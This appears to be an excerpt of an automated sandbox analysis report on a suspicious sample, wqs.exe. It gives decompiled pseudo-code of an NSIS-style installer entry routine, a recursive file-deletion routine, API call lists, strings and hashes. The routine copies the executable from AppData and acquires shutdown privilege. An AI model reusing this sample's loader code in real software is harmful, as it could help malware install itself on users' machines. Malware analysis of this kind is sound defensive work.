Function 016748EB Relevance: 1.6, APIs: 1, Instructions: 58
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(00000001,01675012), ref: 01674B76

Memory Dump Source

Source File: 00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1660000_Over Prime.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: a279bec249379373561b24c3981ec3f96abf1c26a0a65be18cf015957a36b0a5
Instruction ID: 7388fbe234ff604c092cdefbbbb5c025742fa9ddd938869ebec916484d7a1f0c
Opcode Fuzzy Hash: a279bec249379373561b24c3981ec3f96abf1c26a0a65be18cf015957a36b0a5
Instruction Fuzzy Hash: B9118474B08346CFDF259E758EDC3F933929F99244F964629CD038B648DF3099828704

Uniqueness

Uniqueness Score: -1.00%

Function 0167180C Relevance: 1.5, APIs: 1, Instructions: 43
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,01668041), ref: 01671812

Memory Dump Source

Source File: 00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1660000_Over Prime.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5bef397e5b025649a550007be8cc78bf619ec99cba7433efb1b67067de3e3b42
Instruction ID: faf7f2faea22afe4947e9cc008921b85957bb5f1140213bfa42ea3022670bb0f
Opcode Fuzzy Hash: 5bef397e5b025649a550007be8cc78bf619ec99cba7433efb1b67067de3e3b42
Instruction Fuzzy Hash: 89F0C273A446489FCF16DE60DCA45E93FA9AF56360F50859EF902576A2C370CA42D700

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wqs.exePID: 1752, Parent PID: 1660COMMON

Execution Graph

Execution Coverage:	20.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1576
Total number of Limit Nodes:	39

Executed Functions

Function 0040352D Relevance: 81.0, APIs: 33, Strings: 13, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				intOrPtr* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				signed int _t234;
				WCHAR* _t235;

				0x440000 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x434fb8 = _v324.dwBuildNumber;
				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x434fbe != 0x600) {
					_t180 = E0040690A(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E0040689A(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E0040690A(0xb);
				 *0x434f04 = E0040690A(9);
				_t88 = E0040690A(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x434fbc =  *0x434fbc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x434fc0 = _t88;
				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
				E0040653D(0x433f00, L"NSIS Error");
				E0040653D(0x440000, GetCommandLineW());
				_t94 = 0x440000;
				_t234 = 0x22;
				 *0x434f00 = 0x400000;
				if( *0x440000 == _t234) {
					_t94 = 0x440002;
				}
				_t199 = CharNextW(E00405E39(_t94, 0x440000));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E39(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E0040653D(0x440800, _t199);
										L37:
										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034FC(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403B12();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x434f94 == _t189) {
														L77:
														_t120 =  *0x434fac;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E0040690A(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B9D(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x434f1c == _t189) {
												L51:
												 *0x434fac =  *0x434fac | 0xffffffff;
												_v24 = E00403BEC(_t265);
												goto L68;
											}
											_t219 = E00405E39(0x440000, _t189);
											if(_t219 < 0x440000) {
												L48:
												_t264 = _t219 - 0x440000;
												_v8 = L"Error launching installer";
												if(_t219 < 0x440000) {
													_t190 = E00405B08(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t138 = lstrcmpiW(_t235, 0x441800);
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AEB();
														} else {
															E00405A6E();
														}
														SetCurrentDirectoryW(_t235);
														__eflags =  *0x440800;
														if( *0x440800 == 0) {
															E0040653D(0x440800, 0x441800);
														}
														E0040653D(0x436000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x436800 = _t144;
														do {
															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
															DeleteFileW(0x42aa28);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Arthur\\AppData\\Roaming\\wqs.exe", 0x42aa28, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062FD(_t202, 0x42aa28, 0);
																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
																	_t153 = E00405B20(0x42aa28);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x436800 =  *0x436800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062FD(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405F14(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E0040653D(0x440800, _t222);
												E0040653D(0x441000, _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= 0x440000) {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034FC(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034FC(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x434fa0 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}

0x0040353b
0x0040353c
0x00403543
0x00403546
0x0040354d
0x00403550
0x00403563
0x00403569
0x0040356c
0x0040356f
0x0040357d
0x00403585
0x00403590
0x004035a9
0x004035ab
0x004035b3
0x004035b3
0x004035be
0x004035c0
0x004035c0
0x004035d5
0x004035fa
0x00403608
0x0040360b
0x00403612
0x00403619
0x00403619
0x00403612
0x0040361b
0x00403620
0x00403621
0x0040362d
0x00403631
0x00403638
0x00403646
0x0040364b
0x00403652
0x00403656
0x0040365a
0x0040365c
0x0040365c
0x0040365a
0x00403663
0x0040366a
0x00403670
0x00403688
0x00403698
0x004036aa
0x004036b1
0x004036b3
0x004036b4
0x004036c5
0x004036c9
0x004036c9
0x004036dc
0x004036de
0x004037d8
0x004037d8
0x004037db
0x004037de
0x00000000
0x00000000
0x004036e8
0x004036e9
0x004036ec
0x004036f5
0x004036f5
0x004036f8
0x004036fb
0x004036fe
0x00403701
0x00403701
0x00403701
0x00403702
0x00403706
0x004037c6
0x004037cf
0x004037d1
0x004037d4
0x004037d7
0x004037d7
0x004037d7
0x00000000
0x0040370c
0x0040370d
0x0040370e
0x00403712
0x0040372c
0x00403733
0x00403746
0x00403747
0x0040375c
0x00403761
0x00403763
0x00403765
0x00403781
0x00403788
0x0040379b
0x0040379c
0x004037b1
0x004037b7
0x004037b9
0x004037bb
0x004037c3
0x004037c5
0x00000000
0x004037c5
0x004037bf
0x004037c1
0x004037e6
0x004037ea
0x004037f3
0x004037f8
0x004037fe
0x00403809
0x0040380b
0x00403810
0x00403812
0x0040386a
0x0040386f
0x00403878
0x0040387f
0x00403882
0x00403a59
0x00403a59
0x00403a5e
0x00403a67
0x00403a84
0x00403afc
0x00403afc
0x00403b04
0x00403b06
0x00403b06
0x00403b0c
0x00403b0c
0x00403a9b
0x00403aa7
0x00403ab8
0x00403abf
0x00403ac6
0x00403ac6
0x00403ace
0x00403ada
0x00403ae8
0x00403af3
0x00000000
0x00000000
0x00000000
0x00403adc
0x00403adc
0x00403add
0x00403adf
0x00403ae0
0x00403ae1
0x00403ae6
0x00403af5
0x00403af7
0x00000000
0x00403af7
0x00000000
0x00403ae6
0x00403ada
0x00403a71
0x00403a78
0x00403a78
0x0040388e
0x00403935
0x00403935
0x00403941
0x00000000
0x00403941
0x0040389f
0x004038a7
0x004038f9
0x004038f9
0x004038ff
0x00403906
0x00403954
0x00403956
0x0040395b
0x0040395d
0x00403965
0x00403965
0x00403970
0x0040397c
0x00403982
0x00403984
0x00403a57
0x00403a57
0x00403a57
0x00000000
0x0040398a
0x0040398a
0x0040398c
0x0040398d
0x00403996
0x0040398f
0x0040398f
0x0040398f
0x0040399c
0x004039a4
0x004039ab
0x004039b3
0x004039b3
0x004039c0
0x004039cc
0x004039d6
0x004039d6
0x004039d8
0x004039df
0x004039e9
0x004039f5
0x004039fb
0x00403a01
0x00403a04
0x00403a0e
0x00403a14
0x00403a16
0x00403a1a
0x00403a2b
0x00403a31
0x00403a36
0x00403a38
0x00403a3b
0x00403a41
0x00403a41
0x00403a38
0x00403a16
0x00403a44
0x00403a4b
0x00403a4b
0x00403a4b
0x00403a4b
0x00403a52
0x00000000
0x00403a52
0x00403984
0x00403908
0x0040390b
0x0040390f
0x00403914
0x00403916
0x00000000
0x00000000
0x00403922
0x0040392d
0x00403932
0x00000000
0x00403932
0x004038b0
0x004038c8
0x004038d9
0x004038da
0x004038de
0x004038e0
0x004038ee
0x004038f5
0x00000000
0x00000000
0x00000000
0x004038f5
0x004038f7
0x00000000
0x004038f7
0x0040381a
0x00403826
0x0040382b
0x00403830
0x00403832
0x00000000
0x00000000
0x0040383a
0x00403842
0x00403853
0x0040385b
0x0040385d
0x00403862
0x00403864
0x00000000
0x00000000
0x00000000
0x00403864
0x00000000
0x004037c1
0x0040376a
0x0040376c
0x00000000
0x00000000
0x0040376e
0x00403772
0x00403776
0x0040377d
0x0040377d
0x0040377d
0x0040377d
0x00000000
0x0040377d
0x00403778
0x0040377b
0x00000000
0x00000000
0x00000000
0x0040377b
0x00403714
0x00403718
0x0040371b
0x00403722
0x00403722
0x00000000
0x00403722
0x0040371d
0x00403720
0x00000000
0x00000000
0x00000000
0x00403720
0x00000000
0x00000000
0x00000000
0x004036ee
0x004036ee
0x004036ef
0x004036f0
0x004036f0
0x00000000
0x004036ee
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403550
GetVersionExW.KERNEL32(?), ref: 00403579
GetVersionExW.KERNEL32(0000011C), ref: 00403590
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
OleInitialize.OLE32(00000000), ref: 0040366A
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
CharNextW.USER32(00000000,00440000,00000020,00440000,00000000), ref: 004036D6
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
DeleteFileW.KERNELBASE(1033), ref: 0040386F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965

Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00440000,00000000,?), ref: 0040397C
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\wqs.exe,0042AA28,00000001), ref: 00403A0E
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
OleUninitialize.OLE32(?), ref: 00403A5E
ExitProcess.KERNEL32 ref: 00403A78
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
ExitProcess.KERNEL32 ref: 00403B0C

Strings

.tmp, xrefs: 0040396A
UXTHEME, xrefs: 0040361B, 00403620, 00403626
TEMP, xrefs: 0040384E
C:\Users\user\AppData\Roaming\wqs.exe, xrefs: 00403A09
C:\Users\user\AppData\Local\Temp\, xrefs: 004037FE, 00403803, 00403819, 00403825, 00403834, 00403841, 0040384D, 00403855, 00403953, 00403964, 0040396F, 0040397B, 0040398C, 0040399B, 00403A51
Low, xrefs: 0040383C
~nsu, xrefs: 0040394E
Error launching installer, xrefs: 004038FF
SeShutdownPrivilege, xrefs: 00403AA1
\Temp, xrefs: 00403820
1033, xrefs: 0040386A
NSIS Error, xrefs: 0040368E
TMP, xrefs: 00403856

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\wqs.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-2849538963
Opcode ID: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
Opcode Fuzzy Hash: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C49 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F14(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653D(0x42f270, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E58(_t68);
					} else {
						lstrcatW(0x42f270, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f270,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653D(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C01(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040559F(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E0040559F(0xfffffff1, _t68);
											E004062FD(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C49(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f270 - 0x5c;
					if( *0x42f270 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406873(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E0C(_t68);
							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040559F(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040559F(0xfffffff1, _t68);
							return E004062FD(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

APIs

DeleteFileW.KERNELBASE(?,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
FindClose.KERNEL32(00000000), ref: 00405DA2

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C56
\*.*, xrefs: 00405CB4
., xrefs: 00405D18
., xrefs: 00405D04

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1953461807
Opcode ID: d4824498ca5d4646401654330336f54dc3516ea2401a274e156101c2699109e4
Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
Opcode Fuzzy Hash: d4824498ca5d4646401654330336f54dc3516ea2401a274e156101c2699109e4
Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE

Uniqueness

